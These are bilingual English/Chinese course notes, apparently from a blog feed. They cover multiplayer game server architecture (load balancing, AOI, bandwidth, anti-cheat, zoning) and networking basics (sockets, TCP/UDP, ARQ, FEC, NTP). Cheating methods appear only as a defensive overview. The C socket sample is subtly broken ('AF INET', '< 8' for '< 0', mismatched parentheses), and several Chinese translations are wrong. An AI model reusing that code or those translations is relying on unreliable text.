    Refers to the process of distributing a set of tasks over a set of resources (computing units), with the aim of making their overall processing more efficient

    指将一组任务分配到一组资源(计算单元)上的过程,目的是提高其整体处理效率

    • Optimize the response time

      优化响应时间

    • Avoid unevenly overloading some compute nodes while other compute nodes are left idle

      避免在其他计算节点处于空闲状态时,不均匀地使某些计算节点过载

    • All players are evenly divided on multiple servers

      所有玩家平均分布在多个服务器上

    webp

    Consistent Hashing

    一致散列

    It was designed to avoid the problem of having to reassign every player when a server is added or removed throughout the cluster

    它旨在避免在整个集群中添加或删除服务器时必须重新分配每个玩家的问题

    webp

    webp

    webp

    Virtual Server Node in Consistent Hashing

    一致散列中的虚拟服务器节点

    webp

    Servers Management

    • The number of services increases

      服务数量增加

    • Difficult to manage

      难以管理

    • Lacks the flexibility to change the IP or port at a later point in time

      缺乏在以后更改 IP 或端口的灵活性

    webp

    Service Discovery - Registry

    服务发现-注册表

    • Registers itself with the service registry when it enters the system

      当服务进入系统时,在服务注册表中注册

    • An example of Register value

      寄存器值示例

      • server type/server_name@server_ip:port

    webp

    Service Discovery - Query and Watch

    服务发现-查询和监视

    • Request service discovery service to query all values through service type and watch it

      请求服务发现服务通过服务类型查询所有值并查看

    webp

    Service Discovery - Health Check

    服务发现-健康检查

    • Notice Gateway Server B Failure when Server Instance B Heartbeat timeout

      服务器实例 B 心跳超时时通知网关服务器 B 故障

    webp

    Bandwidth Optimization

    优化带宽

    Why Bandwidth Matters

    为什么带宽很重要

    • Usage-based billing: e.g. mobile, cloud service

      基于使用量的计费:例如移动、云服务

    • Latency increased by bandwidth: packet splitting/drop

      延迟随带宽增加:数据包拆分/丢弃

    • Connection drops due to message overflow

      消息溢出导致连接中断

    Calculate Bandwidth

    计算带宽

    Affecting factors

    影响因素

    • n = player numbers 玩家数量
    • f = update frequency 更新频率
    • s = size of game state 游戏状态大小

    webp

    Data transfer per second

    每秒数据传输

    • Server 服务器:$O(n\cdot s\cdot f)$

    • Client (downstream) 客户端(下游):$O(s\cdot f)$

    • Client (upstream) 客户端(上游):$O(f)$

    webp

    Data Compression

    数据压缩

    • There are a lot of floating point numbers in the game synchronization data, such as position, rotation, speed, etc.

      游戏同步数据中有很多浮点数,如位置、旋转、速度等。

    • Choosing the right floating-point precision can save a lot of bandwidth

      选择正确的浮点精度可以节省大量带宽。

      • e.g When representing human running speed, only half precision is required

        例如,在表示人类跑步速度时,只需要一半的精度

    webp

    • When representing player position, the player will only move within a certain range due to player speed limitations

      代表玩家位置时,由于玩家速度限制,玩家只能在一定范围内移动

    • We can divide the map into different small pieces and use the relative position to represent the player’s position, which can reduce the precision of the floating point number of the synchronization position

      我们可以将地图分成不同的小块,并使用相对位置来表示玩家的位置,这会降低同步位置浮点数的精度

    webp

    Object Relevance

    对象相关性

    • The player will be informed of state updates

      玩家将收到状态更新的通知

    • Usually, the ones player can see & interact

      通常,玩家可以看到并互动

    • Easiest implementation: all objects relevant to all clients (for small player num).

      最简单的实现:与所有客户端相关的所有对象(对于小玩家 num)。$O(n^2)$

    • Limiting factor for max concurrent players

      最大并发玩家的限制因素

    webp

    Relevance - Static Zones

    相关性-静态区域

    • Distribute players into different zones

      将玩家分配到不同的区域

    • Players are relevant in the same zone

      玩家在同一区域内具有相关性

    • Reduce bandwidth waste

      减少带宽浪费

    webp

    Relevance - Area of Interest (AOI)

    相关性-关注领域(AOI)

    • The area within which objects are relevant to Player/NPC

      对象与玩家 / NPC 相关的区域

    • Only see & interact with objects within range

      仅查看范围内的对象并与之交互

    • Remove unnecessary network data

      删除不必要的网络数据

    webp

    AOI -Direct Range-Query

    AOI - 直接范围查询

    • $\sqrt{(x_{player}-x_i)2-(y_{player}-y_i)2}\le r_{doi}$

    • Simple to implement 易于实施

    • Time complexity 时间复杂度: $O(n^2)$

    • Not suitable for MMOG, e.g. 1000 players in one zone, 20 ticks/s

      不适合 MMOG,例如一个区域有 1000 名玩家,20 滴答/秒

      1000 x 1000 x 20 = 20,000,000 distance computations per second

      1000 x 1000 x 20 = 每秒 20000000 次距离计算

    webp

    AOI - Spatial-Grid

    AOI - 空间网格

    Mapping Entities

    映射实体

    • Map entity $(x, y)$ → grid $N$

      映射实体$(x, y)$ → 网格 $N$

    • Relevant entities in the grids around current player’s grid

      当前玩家网格周围网格中的相关实体

    • Player’s AOI list can be cached

      玩家的 AOI 列表可以缓存

    webp

    Events

    事件

    Enter

    进入

    • Add entities from observation (observed) list

      从观察(observation)列表中添加实体

    Leave

    离开

    • Remove entities from observation (observed) list

      从观察(已观察)列表中删除实体

    webp

    Pros and Cons

    优点和缺点

    Pros

    • Fast query time $O(1)$

      快速查询时间 $O(1)$

    Cons

    • Small grid: high memory cost

      小网格:内存成本高

    • Large grid: high CPU cost

      大网格:CPU 成本高

    • Object with varying AOI radius?

      具有不同 AOI 半径的物体?

    webp

    AOI - Orthogonal Linked-list

    AOI - 正交链表

    • Game entities in double linked-list

      双链表中的游戏实体

      • xlist, ylist

      • ascending order

        升序

    • Less Objects to traverse

      需要遍历的对象更少

    webp

    Traverse entities

    遍历实体

    • Within aoi radius

      aoi 半径内

    • Left/right direction

      左 / 右方向

    • For both x/y lists

      对于 x/y 两个列表

    webp

    Better Approach - Range Trigger

    更好的方法-范围触发

    • Entity move → trigger move

      实体移动 → 触发移动

    • Compare with trigger

      与触发器比较

    • Event driven

      事件驱动

    webp

    Pros

    • Memory efficient

      内存效率高

    • Varying AOI radius

      可变 AOI 半径

    Cons

    • New object insertion cost $O(n)$

      新对象插入成本 $O(n)$

    • Not Suitable when entities move large distance frequently

      当实体频繁移动远距离时不适用

    webp

    AOI - Potentially Visible Set (PVS)

    AOI - 潜在可见集(PVS)

    • Set of potentially visible areas

      一组潜在可见区域

    • Can be calculated offline

      可以离线计算

    • Determine relevant objects from PVS

      从 PVS 中确定相关对象

    • e.g. Racing game: fast-moving car

      例如赛车游戏:快速行驶的汽车

    webp

    Varying Update Frequency by Player Position

    根据玩家位置改变更新频率

    • Distance-based update frequency

      基于距离的更新频率

    • Only closer objects are interactable

      只有较近的对象是可交互的

    • Distance ↑ → f → bandwidth ↓

      距离 ↑ → f → 带宽 ↓

    webp

    Cheating Kill Online Games

    作弊杀死在线游戏

    How likely, if at all, would you be to stop playing a multiplayer game online if you thought other players were cheating to gain an unfair advantage?

    如果你认为其他玩家作弊以获得不公平的优势,你有多大可能停止玩在线多人游戏?

    Very likelyFairly likelyNot very likelyNor linkly at allDon’t konw
    Global29%48%15%4%5%
    China25%56%16%2%1%
    Germany30%36%17%8%8%
    Japan26%49%16%2%7%
    South Korea27%59%11%1%1%
    UK33%39%12%6%10%
    US37%32%15%7%8%

    77% of players will likely stop playing online games when other players are cheating, according to the survey of Irdeto.

    爱迪德的调查显示,当其他玩家作弊时,77% 的玩家可能会停止玩网络游戏。

    Millions Ways of Cheating

    数百万种作弊方式

    Game code modifications

    游戏代码修改

    • Modify or read memory data

      修改或读取内存数据

    • Crack client

      破解客户端

    System software invoke

    系统软件调用

    • D3D Render Hook

      D3D 渲染挂钩

    • Simulate mouse and keyboard operations

      模拟鼠标和键盘操作

    Net Packet interception

    网络数据包拦截

    • Send fake packets

      发送虚假数据包

    • Modify packet data

      修改数据包

    webp

    Obfuscating Memory

    混淆记忆

    • A cheater might be able to get the location of the player coordinates in the memory and move the character ignoring the game rules, such as passing the wall

      作弊者可能能够获得玩家在内存中的坐标位置,并忽略游戏规则移动角色,例如通过墙壁

    • Furthermore, the cheater can utilize the location of these values to map out even larger data structures in the memory, such as the player object itself

      此外,作弊者可以利用这些值的位置在内存中绘制出更大的数据结构,例如玩家对象本身

    webp

    Executable Packers

    可执行打包器

    • Game core logic can be restored by reverse engineering

      游戏核心逻辑可以通过逆向工程恢复

    • Players can crack the game by analyzing the code, finding game loopholes, making plug-ins, etc…

      玩家可以通过分析代码、发现游戏漏洞、制作插件等来破解游戏…

    webp

    • The packager obfuscates the source program and adds decompression code

      打包器混淆源程序并添加解压缩代码

    • The decompression code will execute first, and the source program is decrypted in memory

      解压缩代码将首先执行,源程序在内存中解密

    webp

    Verifying Local Files by Hashing

    通过哈希验证本地文件

    • Ensure that the game files have not been modified

      确保游戏文件未被修改

    • For example, the cheater could modify the wall textures to be transparent so all enemies could be seen through the walls

      例如,作弊者可以将墙壁纹理修改为透明,这样所有敌人都可以透过墙壁看到

    • The cheater could also adjust the lightning to make it easier to see enemies

      作弊者还可以调整闪电,使其更容易看到敌人

    webp

    Packet Interception and Manipulation

    数据包拦截和操纵

    • When the data is not encrypted or hacked, the player can build game logic based on packet data even without starting the game

      当数据未被加密或黑客攻击时,即使不启动游戏,玩家也可以基于数据包构建游戏逻辑

    • Such cheat programs often become money-making tools, which seriously reduce game’s the overall profit

      这种作弊程序往往成为赚钱的工具,严重降低了游戏的整体利润

    webp

    Encrypt the Network Traffic

    加密网络流量

    Two kinds of algorithms

    两种算法

    • Symmetric-key algorithm

      对称密钥算法

      • Obfuscate and restore data according to the same key

        根据同一密钥混淆和还原数据

      • Fast and efficient

        快速高效

    webp

    Asymmetric encryption

    非对称加密

    • Encryption and decryption use different keys

      加密和解密使用不同的密钥

    • Slow, only used for encrypting critical data

      速度慢,仅用于加密关键数据

    webp

    • Distribute symmetric key securely using asymmetric encryption

      使用非对称加密安全地分发对称密钥

    • Transfer data using symmetric encryption key

      使用对称加密密钥传输数据

    webp

    System Software Invoke

    系统软件调用

    • Modify the DirectX kernel and change the execution flow of the rendering function

      修改 DirectX 内核并更改渲染函数的执行流程

    • Can force the rendering engine to modify the occlusion relationship

      可以强制渲染引擎修改遮挡关系

    • See the movement of the enemy behind the wall

      看墙后敌人的动向

    webp

    Valve Anti-Cheat and Easy Anti-Cheat

    阀门防作弊和简易防作弊

    • Detects malicious behavior caused by any file conflicts while interacting with the game

      检测与游戏交互时由任何文件冲突引起的恶意行为

    • Stops the player from playing the game at all

      完全阻止玩家玩游戏

    • Prevents any illegal modifications and configuration changes that enable the use of exploits in a game

      防止任何非法修改和配置更改,从而在游戏中使用漏洞

    webp

    AI Cheat

    AI 作弊

    • All platforms

      所有平台

    • No code modification required

      无需修改代码

    • Independent from the game

      独立于游戏

    • Game screen

      游戏画面

    • Target detection

      目标检测

    • Move cursor

      移动光标

    • Fire

      开火

    webp

    Rich AI Middlewares

    丰富的 AI 中间件

    • Real-Time Object Detection. YOLO V5, V7…

      实时目标检测。YOLO V5,V7…

    • Skeleton based Action recognition

      基于骨架的动作识别

    webp

    Counter-Strike: Overwatch

    反恐精英:守望先锋

    • The system is based on other players reviewing footage from players that are suspected of cheating

      该系统基于其他玩家查看涉嫌作弊的玩家的录像

    • Many reviewers are looking at the same cases and the majority decide whether the suspect was cheating or not

      许多审查人员正在审查同样的案件,大多数人决定嫌疑人是否作弊

    webp

    Passing judgement after reviewing evidence in Counter Strike: Global Offensive’s Overwatch system

    在《反恐精英:全球攻势的守望先锋》系统中审查证据后作出判断

    Statistic-based System

    基于统计的系统

    • Collect the user’s game information, such as victory and critical hit rate

      收集用户的游戏信息,如胜利和暴击率

    • Compare your own historical data and some thresholds rules or from other player’s reports to mark players

      比较您自己的历史数据和一些阈值规则或其他玩家的报告,以标记玩家

    • Check manually to confirm whether they cheat

      手动检查以确认他们是否作弊

    webp

    Detecting Known Cheat Program

    检测已知作弊程序

    • A proper anti-cheat program should have a way to scan the user’s computer for known cheating programs based on various signatures

      一个合适的反作弊程序应该有一种方法,可以根据各种签名扫描用户的计算机,寻找已知的作弊程序

    • The simplest method can simply entail comparing hashes or process names

      最简单的方法可能只是比较哈希或进程名称

    webp

    Build a Scalable World

    构建一个可扩展的世界

    Scalable Game Servers

    可扩展游戏服务器

    Zoning

    分区

    • Distribute large player numbers in a large world

      在广阔的世界中分配大量玩家

    • Distribution might be uneven

      分布可能不均匀

    Instancing

    实例化

    • Run a large number of game areas independently in parallel

      并行独立运行大量游戏区域

    • Reduce congestion/competition

      减少拥堵 / 竞争

    Replication

    同步

    • Allows high user density

      允许高用户密度

    • E.g. high density PVP games

      例如高密度 PVP 游戏

    Zoning - Seamless Zones

    分区-无缝分区

    • Players are reasonably distributed in a large world

      玩家在广阔的世界中分布合理

    • The client only connects to one responsible server

      客户端只连接到一个负责的服务器

    • Cross border: auto transfer client to another server

      跨境:自动将客户端转移到另一台服务器

    webp

    Zone Border

    区域边界

    Smooth experience:

    流畅体验:

    • Border width >= max AOI radius

      边框宽度 >= 最大 AOI 半径

    But how to make them interact?

    但是如何让它们互动呢?

    webp

    Zone Border - Entities

    区域边界-实体

    Active Entity

    活跃实体

    • Resides in connected zoned server (authority)

      驻留在已连接的分区服务器(权限)中

    • Has a ghost agent in other zones

      在其他区域有幽灵特工

    • Can see ghost entities in another zone

      可以在另一个区域中看到幽灵实体

    Ghost Entity

    幽灵实体

    • Also called shadow entity

      也称为阴影实体

    • Is an agent entity owned by another zone

      代理实体是否由另一个区域拥有

    • Receive updates from original entity

      接收来自原始实体的更新

    webp

    Cross Border: A -> B

    跨境:A->B

    1. Before move

      移动前

      • An active entity in zone A

        A 区中的活动实体

    2. Near boundary (A)

      近边界(A)

      • Active in A; Ghost in B

        活跃在 A;鬼魂在 B

    3. At boundary

      边界处

      • The entity has been transferred to zone B

        实体已转移到 B 区

    4. Near boundary (B)

      边界附近(B)

      • Active in B; Ghost in A

        活跃于 B;鬼魂在 A

    5. Beyond boundary (B)

      边界之外(B)

      • Removedfrom zone A

        从 A 区移除

    webp

    Replication

    同步

    • Cooperatively process same world zone

      合作处理同一世界区

    • Entity updates are distributed among servers

      实体更新分布在服务器之间

    • Each server creates its own active entities

      每个服务器都创建自己的活动实体

    • Updates to active entities will be auto replicated to all remaining servers (as Ghost)

      对活动实体的更新将自动复制到所有剩余的服务器(作为 Ghost)

    webp

    Scalable Game Servers -Combination

    webp

    References

    Replicate Character Movement

    Lag Mitigation

    MMOG Network Architecture

    Bandwidth Optimization

    Anti-Cheat

    Citation

    ]]>
    + 资源

    课程

    第十八节:网络游戏的架构基础

    Online Gaming Architecture: Fundamentals

    网络游戏架构

    PLAY ANYWHERE WITH ANYONE

    与任何人随时随地玩游戏

    Game developers have never stopped exploring multiplayer online gaming

    游戏开发商从未停止探索多人在线游戏

    Challenges in Multiplayer Online Gaming

    多人联机游戏的挑战

    Consistency

    一致性

    • Network Synchronization

      网络同步

    Reliability

    可靠性

    • Network Latency

      网络延迟

    • Drop and Reconnect

      断线重连

    Security

    安全性

    • Cheats

      作弊

    • Accounts Hacked

      账户被黑客攻击

    Diversities

    多样性

    • Cross-Play

      交叉游戏

    • Rapid iteration

      快速迭代

    • Multiple Game Systems

      多游戏系统

    Complexities

    复杂性

    • High Concurrency

      高并发性

    • High Availability

      高可用性

    • High Performance

      高性能

    Network Protocols

    网络协议

    The Founding Fathers of the Internet

    互联网的创始人(一开始用于军事用途)

    Designed the TCP/lP protocols andthe internet architecture.

    设计了 TCP/IP 协议和互联网架构。

    In 1977 Cerf and Kahn will link three networks (packet radio, satellite, and the ARPANET) and prove the efficacy of their TCP/lP protocol in a dramatic round-the-world transmission from a moving vehicle, the SRl Packet RadioResearch van.

    1977 年,Cerf 和 Kahn 将连接三个网络(分组无线电、卫星和 ARPANET),并证明他们的 TCP/lP 协议在移动车辆 SRl 分组无线电研究车的戏剧性环球传输中的有效性。

    How to communication between two PCs

    • A and B must agree on the meaning of the bits being sent and received at many different levels, including

      A 和 B 必须就在许多不同级别发送和接收的比特的含义达成一致,包括

      • How many volts represents a 0 bit, and for a 1 bit?

        多少伏特代表 0 位,多少伏特代表 1 位?

      • How does receiver know which is the last bit?

        接收器如何知道哪个是最后一位?

      • How many bits long is a number?

        一个数字有多少位长?

    webp

    The Problem of Communication

    沟通问题

    webp

    • Re-implement every application for every new underlying transmission medium?

      为每个新的底层传输介质重新实施每个应用程序

    • Change every application on any change to an underlying transmission medium?

      在更改基础传输介质时更改每个应用程序

    • No! But how does the Internet design avoid this?

      不!但是,互联网设计是如何避免这种情况的呢?

    Solution: Layering

    解决方法:分层

    webp

    • Intermediate layers provide a set of abstractions for applications and media

      中间为应用程序和媒体提供了一组抽象

    • New applications or media only need implementation for intermediate layer’s interface

      新的应用程序或媒体只需要实现中间层的接口

    Layering in the internet - OSI Model

    互联网分层——OSI 模型

    Application 应用层

    • Provides functions to users 为用户提供功能

    Presentation 表示层

    • Converts different representations 转换不同的表示形式

    Session 会话层

    • Manages task dialogs 管理任务对话框

    Transport 传输层

    • Provides end-to-end delivery 提供端到端交付

    Network 网络层

    • Sends packets over multiple links 通过多个链路发送数据包

    Data Link 数据链路层

    • Sends frames of information 发送信息帧

    Physical 物理层

    • Sends bits as signals 以信号形式发送比特

    webp

    Network Socket-based Communication

    基于网络套接字的通信

    webp

    Socket

    套接字

    A software structure within a network node of a computer network that serves as an endpoint for sending and receiving data across the network.

    计算机网络的网络节点内的软件结构,用作通过网络发送和接收数据的端点。

    A Socket is combination of an lP Address and a Port Number.

    Socket 是 IP 地址和端口号的组合。

    webp

    1
    2
    3
    4
    5
    6
    7
    8
    9
    10
    11
    12
    13
    14
    15
    16
    17
    18
    19
    20
    21
    22
    23
    24
    25
    26
    27
    28
    29
    30
    // server side
    struct sockaddr_in saddr, caddr;
    int sockfd, clen, isock;
    unsigned short port = 80;

    if ((sockfd=Socket(AF INET,SOCK STREAM,0) < 0) {
    printf("Error creating socket\n");
    ...
    }

    memset(&saddr, '\0', sizeof(saddr)); // zero structure out
    saddr.sin family = AF INET; // match the socket() call
    saddr.sin addr.s addr = htonl(INADDR ANY); // bind to any local addresss
    addr.sin port = htons(port); // specify port to listen on

    if((bind(sockfd, (struct sockaddr *)&saddr, sizeof(saddr)) < 8) { // bind
    printf("Error binding\n");
    ...
    }

    if(listen(sockfd, 5) < 0) { // listen for incoming connections
    printf("Error listening\n");
    ...
    }

    clen=sizeof(caddr)
    if((isock=accept(sockfd, (struct sockaddr *)&caddr, &clen)) < 8) { // accept one
    printf("Error accepting\n");
    ...
    }

    Setup Socket

    安装套接字

    Both client and server need to setup the socket

    客户端和服务器都需要设置套接字

    • Function
      int socket(int domain, int type, int protocol)

      • domain

        • AF_INET – IPV4

        • AF_INET6 – IPV6

        • type

          • SOCK_STREAM – TCP

          • SOCK_DGRAM – UDP

        • protocol

          • 0
      • E0
        int sockfd = socket(AF_INET, SOCK_STREAM, 0)

    Transmission Control Protocol (TCP)

    传输控制协议(TCP)

    • Connection-Oriented

      面向连接

    • Reliable and Ordered

      可靠且有序

    • Flow Control

      流量控制

    • Congestion Control

      拥堵控制

    webp

    TCP Retransmission Mechanisms

    TCP 重传机制

    Duplicate ACKs

    重复 ACK

    • Senders sends packets and seqnos

      发送方发送数据包和序列号

      • 1,2, 3, 4, 5, 6, 7, 8
    • Assume 5th packet (seqno 5) is lost, Streamof ACKs will be

      假设第 5 个数据包(序列号 5)丢失,则 ACK 流将

      • 1, 2, 3, 4, 4, 4, 4

    webp

    TCP congestion control

    TCP 拥塞控制

    • The congestion window (CWND) of TCP starts to grow from a small value

      TCP 的拥塞窗口(CWND)从一个小值开始增长

    • When congestion occurs, packet loss or timeout, CWND will be reduced according to a certain algorithm

      当发生拥塞、丢包或超时时,CWND 将根据特定算法减少

    • This leads to high delay and cause delay jitter

      这会导致高延迟并导致延迟抖动

    webp

    As the main transmission protocol on the lnternet, TCP congestion control is necessary, otherwise it will cause congestion collapse. TCP congestion control is the main congestion control measure on the Internet, and it is also the main cause of TCP performance problems.

    作为互联网上的主要传输协议,TCP 拥塞控制是必要的,否则会导致拥塞崩溃。TCP 拥塞控制是互联网上主要的拥塞控制措施,也是 TCP 性能问题的主要原因。

    User Datagram Protocol (UDP)

    用户数据报协议(UDP)

    David P. Reed

    He was involved in the early developmentof TCP/lP, and was the designer of the User Datagram Protocol (UDP), thoughhe finds this title “a little embarrassing”.

    他参与了 TCP/lP 的早期开发,是**用户数据报协议(UDP)**的设计者,尽管他觉得这个头衔“有点尴尬”。

    He was also one of the authors of theoriginal paper about the end-to-end principle, End-to-end arguments insystem design, published in 1984.

    他也是 1984 年发表的关于端到端原理系统设计中的端到端论证的原始论文的作者之一。

    UDP Features

    UDP 功能

    UDP (User Datagram Protocol)

    UDP(用户数据报协议)

    • Connectionless

      无连接

    • UnReliable and Unordered

      不可靠和无序

    • NO Flow Control

      无流量控制

    • NO Congerstion Control

      无堵塞控制

    webp

    Network Protocols Usage in Game

    Game suitable for use

    • TCP

      炉石

    • UDP

      守望先锋、CSGO

    TCPUDP
    Structure
    结构
    Segments
    部分
    Datagrams
    数据报
    Connection Model
    连接模型
    Connection-Oriented
    面向连接的
    Connectionless
    无连接的
    Speed
    速度
    Slow
    Fast
    Reliability
    可靠性
    Reliable
    可靠
    Unreliable
    不可靠
    Header
    标头
    20 Bytes
    8 Bytes
    Data Transfer
    数据传输
    Ordered
    有序的
    Unordered
    无序的
    Control
    控制
    Flow Control
    流量控制
    NO Flow Control
    无流量控制

    Reliable UDP

    可靠 UDP,在 UDP 的基础上加以改进。

    TCP is Not Time Critical

    TCP 不重视及时性

    • TCP is the complex and heavyweight protocol. lt provides reliable delivery and advanced features, but it has more overhead.

      TCP 是复杂而重量级的协议。它提供可靠的交付和高级功能,但开销更大。

    • TCP is a fair, traffic oriented protocol designed to improve bandwidth utilization. But it’s not designed for speed.

      TCP 是一种公平的、面向流量的协议,旨在提高带宽利用率。但它不是为速度而设计的。

    • So Why TCP is slow?

      为什么 TCP 很慢?

    UDP is Fast but Unreliable

    UDP 速度快但不可靠

    • UDP is lightweight and fast but unreliable, packet loss and disorder will occur.

      UDP 是轻量级和快速的,但不可靠,会发生数据包丢失和混乱。

    • How to achieve reliable and real-time communication?

      如何实现可靠和实时的通信?

    Why We Need to Customize Protocol

    为什么我们需要定制协议

    • Game Server

      游戏服务器

      • Keep-alived connection (TCP)

        保持有效连接(TCP)

      • Need keep logic consistency in “order” (TCP)

        需要保持“顺序”(TCP)中的逻辑一致性

      • High responsive & low latency (UDP)

        高响应和低延迟(UDP)

      • Broadcast commonly used (UDP)

        常用广播(UDP)

    • Web Server

      Web 服务器

      • Handles the HTTP protocol

        处理 HTTP 协议

      • Delivers static web content e.g., HTML pages, files, images, video.

        提供静态网络内容,例如 HTML 页面、文件、图像、视频。

    Acknowledgement & Sequence Number

    确认和序列号

    • Positive acknowledgment (ACK) is a signal that is passed between communicating processes, computers, or devices to signify acknowledgment, or receipt of message

      **肯定应答(ACK)**是在通信进程、计算机或设备之间传递的信号,表示确认或收到消息

    • Negative ACK (NACK or NAK) is a signal that is sent to reject a previously receivedmessage or to indicate some kind of error

      **否定 ACK(NACK 或 NAK)**是一种信号,用于拒绝之前接收到的消息或指示某种错误

    • Sequence number (SEQ) is a counter used to keep track of every byte sent outward bya host

      **序列号(SEQ)**是一个计数器,用于跟踪主机向外发送的每个字节

    • Timeouts specified periods of time allowed to elapse before an acknowledgment is tobe received

      超时在收到确认之前允许经过的特定时间段

    Automatic Repeat Request (ARQ)

    自动重复请求(ARQ)

    An error-control method for data transmission that uses ACK and timeouts to achieve reliable data transmission over an unreliable communication channel.

    一种用于数据传输的错误控制方法,该方法使用 ACK 和超时来在不可靠的通信信道上实现可靠的数据传输。

    If the sender does not receive an acknowledgment before the timeout, it re-transmits thepacket until it receives an acknowledgment or exceeds a predefined number of retransmissions.

    如果发送方在超时之前没有收到确认,它会重新发送数据包,直到收到确认或超过预定义的重新传输次数。

    • Sliding window protocol

      滑动窗口协议

      • Stop-and-Wait ARQ

        停止并等待 ARQ

      • Go-Back-N ARQ

      • Selective Repeat ARQ

        选择性重复 ARQ

    Sliding Window Protocol

    滑动窗口协议

    • Send mutilple frames at a time, number of frames to be sent is based on Window size

      一次发送多个帧,要发送的帧数基于窗口大小

    • Each frame is numbered by Sequence number

      每帧按序列号编号

    • When the frame at the front of the window is received, the window slides

      当收到窗户前部的框架时,窗户会滑动

    webp

    webp

    Stop-and-Wait ARQ

    停止并等待 ARQ

    • Windows size = 1

      窗口大小 = 1

    • After transmitting one frame, the sender waits for an ACK before transmitting the next frame

      发送一帧后,发送方在发送下一帧之前等待 ACK

    • If the ACK does not arrive after a certain time, the sender times out and retransmits the original frame

      如果 ACK 在特定时间后未到达,则发送方超时并重新传输原始帧

    • Poor utilization of bandwidth, poor performance

      带宽利用率低,性能差

    webp

    Go-Back-N ARQ

    • N is Sender’s Windows Size

      N 是发件人的窗口大小

    • The Receiver only sends cumulative ACK

      接收器仅发送累积 ACK

    • If an ACK is not received within an agreed-upon time period, all frames in the current window are transmitted

      如果在商定的时间段内未收到 ACK,则传输当前窗口中的所有帧

    webp

    Selective Repeat ARQ

    选择性重复 ARQ

    • In Selective Repeat ARQ, only the damaged or lost frames are retransmitted

      在选择性重复 ARQ 中,只有损坏或丢失的帧会被重新传输

    • The receiver sends the ack of each frame, and the sender maintains the timeout time of each frame

      接收方发送每帧的 ack,发送方保持每帧的超时时间

    • When receiver receive damaged packet, it willsend a NACK, The sender will send/retransmitframe for which NACK is received

      当接收方收到损坏的数据包时,它将发送一个 NACK。发送方将发送/重新发送收到 NACK 的帧

    webp

    Make UDP Reliable in Packet Loss Scenario

    在丢包情况下使 UDP 可靠

    With the increase of packet loss rate and delay, the reliable UDP can not meet the transmission requirements gradually.eg. lf packet loss rate increase to 20%, use reliable UDP is still with high delay.

    随着丢包率和延迟的增加,可靠的 UDP 逐渐无法满足传输要求。例如,如果丢包率增加到 20%,使用可靠的 UDP 仍然具有高延迟。

    webp

    Forward Error Correction (FEC)

    前向纠错(FEC)

    • The transmission of enough additiona, redundant information with the primary data stream to reconstruct lost lP packets up to a certain extent

      与主数据流一起传输足够的附加、冗余信息,以在一定程度上重建丢失的 IP 数据包

    webp

    XOR-FEC

    ABA XOR B
    000
    011
    101
    110
    Law 律Desc 描述
    Law of identity 同一律A xor 0 = A
    Zeroing law 零律A xor A = 0
    Commutative law 交换律A xor B = B xor A
    Associative law 结合律A xor (B xor C) = (A xor B) xor C

    C = A xor B

    A = A xor (B xor B) = (A xor B) xor B = C xor B

    B = (A xor A) xor B = A xor C

    • There are four packets A, B, C, D
      • Let E = XOR (A, B, C, D)
      • A = XOR (B, C, D, E)
      • B = XOR (A, C, D, E)
      • C = XOR (A, B, D, E)
      • D = XOR (A, B, C, E)

    webp

    If any packet is lost, it can be recovered with the other four packets.

    如果任何一个数据包丢失,可以用其他四个数据包恢复。

    Only one packet can be lost in continuous data. lf $A$ and $B$ are lost at the same time, the algorithm cannot recover.

    连续数据中只能丢失一个数据包。如果 $A$ 和 $B$ 同时丢失,则算法无法恢复。

    Reed-Solomon Codes

    里德-所罗门码

    There are $N$ valid data, and $M$ FEC data are expected to be generated

    有 $N$ 个有效数据,预计将生成 $M$ 个 FEC 数据

    • Form $N$ valid data into a unit vector $D$

      将 $N$ 个有效数据转换为单位向量 $D$

    • Generate a transformation matrix $B$: it is composed of a $N$-order identity matrix and a $N * M$ Vandemode matrix (The matrix composed of any n rows of
      matrix $B$ is reversible)

      生成一个变换矩阵 $B$:它由一个 $N$ 阶恒等式矩阵和一个 $N * M$ Vandemode 矩阵组成(该矩阵由以下任意 $N$ 行组成矩阵 $B$ 是可逆的)

    • The matrix $G$ obtained by multiplying the matrix $B$ and Vector $D$ contains $M$ redundant FEC data

      通过将矩阵带向量 $D$ 相乘获得的矩阵 $G$ 包含 $M$ 个冗余 FEC 数据

    webp

    Assume $D1$, $D4$, $C2$ are lost

    假设 $D1$、$D4$、$C2$ 丢失

    • The $B$ matrix also needs to delete the corresponding $M$ rows to obtain a deformation matrix of $B’$

      $B$ 矩阵还需要删除相应的 $M$ 行,以获得 $B’$ 的变形矩阵

    webp

    • Inverse matrix $B’$ get $B^{-1}$

      逆矩阵 $B’$ 得到 $B^{-1}$

    • Multiply $B’^{-1}$ on both sides to recover the original data

      将两侧的 $B’^{-1}$ 相乘以恢复原始数据

    webp

    Customize Your UDP based on ARQ and FEC

    基于 ARQ 和 FEC 自定义 UDP

    Reliability

    可靠性

    • Use Selective Repeat ARQ

      使用选择性重复 ARQ

    Hybrid ARQ and FEC

    混合 ARQ 和 FEC

    • Before ARQ, FEC is used for error correction

      在 ARQ 之前,FEC 用于纠错

    Real-time

    实时

    • Smaller RTO growth

      RTO 增长较小

    • No congestion control

      无拥堵控制

    • Fast retransmission mechanism

      快速重传机制

    • No delay ACK

      无延迟确认

    Flexibility

    灵活性

    • Design protocol for speed

      速度设计协议

    • Support both reliable and unreliable transmission

      支持可靠和不可靠的传输

    Clock Synchronization

    时钟同步

    RTT

    Round-Trip Time

    往返时间

    • Send/Recv delay

      发送/接收延迟

    • Propagation delay

      传播延迟

    • Response time of the origin server

      源服务器的响应时间

    RTT vs. Ping

    • Ping tests are usually performed within a transport protocol that uses lCMP packets

      Ping 测试通常在使用 lCMP 数据包的传输协议中执行

    • RTT is measured at the application layer

      RTT 在应用层进行测量

    RTT vs. Latency

    • Latency is the time required for a data packet to travel from the sending endpoint to the receivingend point (only one trip)

      延迟是数据包从发送端点传输到接收点所需的时间(仅一次行程)

    webp

    Network Time Protocol (NTP)

    网络时间协议(NTP)

    Network lime Protocol is an internet protocol used tosynchronize with computer clock time sources in a network.

    网络时间协议是一种用于与网络中的计算机时钟时间源同步的互联网协议。

    • Reference clock

      参考时钟

      • GPS clock or radio ransmiiting station

        GPS 时钟或无线电传输站

      • Amazinglly precise timekeeping devices such as atomic clocks

        令人惊叹的精确计时设备,如原子钟

      • Not connected to the internet

        未连接到互联网

      • Send their time through radio or optical fiber

        通过无线电或光纤发送他们的时间

    Time Server Stratums

    时间服务器层

    Stratum Values

    • Degrees of separation from the reference clock

      与参考时钟的分离程度

    • Reference clock has stratum value of 0

      参考时钟的层值为 0

    • Servers with stratum value 1 is called primary time servers

      层值为 1 的服务器称为主时间服务器

